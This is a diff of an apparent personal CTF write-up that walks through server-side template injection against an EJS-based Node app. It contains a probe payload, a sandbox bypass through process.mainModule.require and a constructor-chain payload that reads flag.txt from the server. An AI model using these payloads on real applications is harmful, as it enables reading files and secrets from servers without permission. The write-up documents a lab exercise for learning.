aidanvoidout/aidanvoidout.github.io/_writeups/sentinel_ctfs.md

 i then did some googling and found the payload `{{<%[%'"}}%\.` on https://www.imperva.com/learn/application-security/server-side-template-injection-ssti/, which managed to throw an error, 'Error: Could not find matching close tag for "<%".'

-according to chatgpt this error comes from EJS (embedded javascript)
+bingo. according to chatgpt this error comes from EJS (embedded javascript)

 the payload `<%= require('fs').readdirSync('.') %>` yields an error
 'ReferenceError: ejs:1 >> 1 Fuzzed <%= require('fs').readdirSync('.') %> require is not defined'

+it looks like `require` is off limits... directly...

-this suggests that the local environment doesn't have require, this can be circumvented by a payload like `<%= global.process.mainModule.require('fs').readdirSync('.') %>`, which lists all the contents of the source directory: 'Fuzzed Dockerfile,app.js,flag.txt,node_modules,package-lock.json,package.json'
+this can be circumvented by a payload like `<%= global.process.mainModule.require('fs').readdirSync('.') %>`, which lists all the contents of the source directory: 'Fuzzed Dockerfile,app.js,flag.txt,node_modules,package-lock.json,package.json'

 we want to read flag.txt, this can be done using the payload `<%= this.constructor.constructor("return process.mainModule.require('fs').readFileSync('flag.txt', 'utf8')")() %>`